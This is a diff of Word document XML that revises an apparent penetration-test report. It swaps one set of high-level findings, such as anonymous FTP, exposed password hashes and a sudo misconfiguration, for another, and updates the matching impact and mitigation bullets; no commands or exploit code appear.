           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -10251,8 +9866,240 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t>Vulnerability Analysis</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Anonymous FTP Access</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>The FTP service allowed anonymous login which exposed sensitive files.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Sensitive File Exposure</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>A backup file containing password hashes was accessible through FTP.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Weak Password Security</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>One of the hashes was cracked easily using a dictionary attack.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Sudo Misconfiguration</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The user had permission to execute the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>ed</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> binary with root privileges, allowing privilege escalation.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -10264,221 +10111,8 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Vulnerability Analysis</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Weak Credentials</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>FTP allowed login using easily guessable credentials.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Command Injection</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>The search functionality executed system commands without proper validation.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Information Disclosure</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Sensitive credentials were stored inside a readable backup file.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Kernel Vulnerability</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Outdated Linux kernel allowed local privilege escalation.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -10490,8 +10124,104 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t>Impact</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>These vulnerabilities allowed an attacker to:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>• Access sensitive files via FTP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>• Crack system credentials</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>• Gain SSH access to the machine</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>• Escalate privileges to root</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>• Fully compromise the system</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -10503,98 +10233,6 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Impact</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>These vulnerabilities allowed an attacker to:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>• Gain FTP access</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>• Execute system commands</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>• Retrieve sensitive credentials</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>• Escalate privileges to root</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>• Fully compromise the system</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -10625,6 +10263,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Mitigation Recommendations</w:t>
       </w:r>
     </w:p>
@@ -10645,7 +10284,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>• Enforce strong password policies</w:t>
+        <w:t>• Disable anonymous FTP access</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10655,7 +10294,7 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:br/>
-        <w:t>• Sanitize user inputs in web applications</w:t>
+        <w:t>• Restrict sensitive file exposure</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10665,7 +10304,7 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:br/>
-        <w:t>• Remove sensitive files from public directories</w:t>
+        <w:t>• Use strong password policies</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10675,7 +10314,7 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:br/>
-        <w:t>• Update Linux kernel regularly</w:t>
+        <w:t>• Implement proper sudo privilege restrictions</w:t>
       </w:r>
       <w:r>
